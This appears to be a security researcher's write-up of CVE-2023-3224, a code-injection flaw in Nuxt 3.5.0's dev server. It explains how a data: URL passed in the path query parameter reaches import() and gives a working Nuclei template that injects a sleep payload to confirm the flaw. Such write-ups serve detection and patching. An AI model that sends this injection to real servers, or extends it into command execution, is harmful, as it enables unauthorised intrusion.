https://nuxt.com/docs/examples/essentials/hello-world
Create the files following that example, then pin `nuxt` in package.json to the vulnerable version (3.5.0 below).
```json
{
  "name": "example-hello-world",
  "private": true,
  "scripts": {
    "build": "nuxi build",
    "dev": "nuxi dev",
    "start": "nuxi preview"
  },
  "devDependencies": {
    "nuxt": "3.5.0"
  }
}
```
https://github.com/nuxt/nuxt/commit/65a8f4eb3ef1b249a95fd59e323835a96428baff
If the server is running in dev mode and the request URL starts with /__nuxt_component_test__/, the handler imports #build/test-component-wrapper.mjs. That wrapper takes the module path out of the query string and passes it straight to import(). Because a `data:text/javascript,...` URL is a valid ES module specifier in Node, the attacker's code travels inside the URL and executes when the import is evaluated, which gives RCE.
PoC

Importing child_process to run a command produced a 500 error, so I had to use other gadgets from node_modules.

When writing the template I also had to decide how to verify the hit. Some targets cannot run commands at all, so I simply used a sleep delay as the signal. I then found that Nuxt caches during rendering: if two payloads are identical it only sleeps once, so I added a random value ({{randstr}}) to the payload.
```yaml
id: CVE-2023-3224

info:
  name: nuxt developer mode RCE
  author: Y4er
  severity: critical
  description: |
    RCE in developer mode in nuxt/nuxt
  reference:
    - https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-3224
    cwe-id: CWE-94
  tags: cve,cve2023,rce,http,nuxt

http:
  - method: GET
    path:
      - "{{BaseURL}}/__nuxt_component_test__/?path=data:text/javascript,await%20new%20Promise(resolve%20=%3E%20setTimeout(resolve,%206000));console.log('{{randstr}}')"

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
```
https://huntr.dev/bounties/1eb74fd8-0258-4c1f-a904-83b52e373a87/
My writing is poor, the wording flippant, the content shallow and the technique clumsy. Corrections and pointers from the masters are welcome and much appreciated.